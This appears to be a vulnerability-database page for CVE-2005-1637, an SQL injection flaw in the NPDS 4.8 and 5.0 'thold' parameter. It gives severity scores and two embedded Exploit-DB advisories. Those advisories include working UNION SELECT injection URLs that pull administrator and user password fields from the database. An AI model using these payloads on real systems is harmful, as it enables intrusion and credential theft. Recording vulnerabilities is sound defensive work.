CVE-2005-1637
published 2005-05-17CVE-2005-1637: Multiple SQL injection vulnerabilities in NPDS 4.8 and 5.0 allow remote attackers to execute arbitrary SQL commands via the thold parameter to (1) comments.php…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.13%
62.3th percentile
Multiple SQL injection vulnerabilities in NPDS 4.8 and 5.0 allow remote attackers to execute arbitrary SQL commands via the thold parameter to (1) comments.php or (2) pollcomments.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| npds | npds | — | — |
| npds | npds | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
NPDS 4.8/5.0 - 'pollcomments.php?thold' SQL Injection
exploitdb·2005-05-16
CVE-2005-1637 NPDS 4.8/5.0 - 'pollcomments.php?thold' SQL Injection
NPDS 4.8/5.0 - 'pollcomments.php?thold' SQL Injection
---
source: https://www.securityfocus.com/bid/13649/info
NPDS is prone to an SQL injection vulnerability.
This issue is due to a failure in the application to properly sanitize user-supplied input to the 'thold' parameter.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
All versions are considered to be vulnerable at the moment.
http://www.example.com/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM %20authors
http://www.example.com/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,
Exploit-DB
NPDS 4.8/5.0 - 'comments.php?thold' SQL Injection
exploitdb·2005-05-16
CVE-2005-1637 NPDS 4.8/5.0 - 'comments.php?thold' SQL Injection
NPDS 4.8/5.0 - 'comments.php?thold' SQL Injection
---
source: https://www.securityfocus.com/bid/13649/info
NPDS is prone to an SQL injection vulnerability.
This issue is due to a failure in the application to properly sanitize user-supplied input to the 'thold' parameter.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
All versions are considered to be vulnerable at the moment.
http://www.example.com/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
http://www.example.com/npds/comments.php?thold =0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
No writeups or analysis indexed.
2005-05-17
Published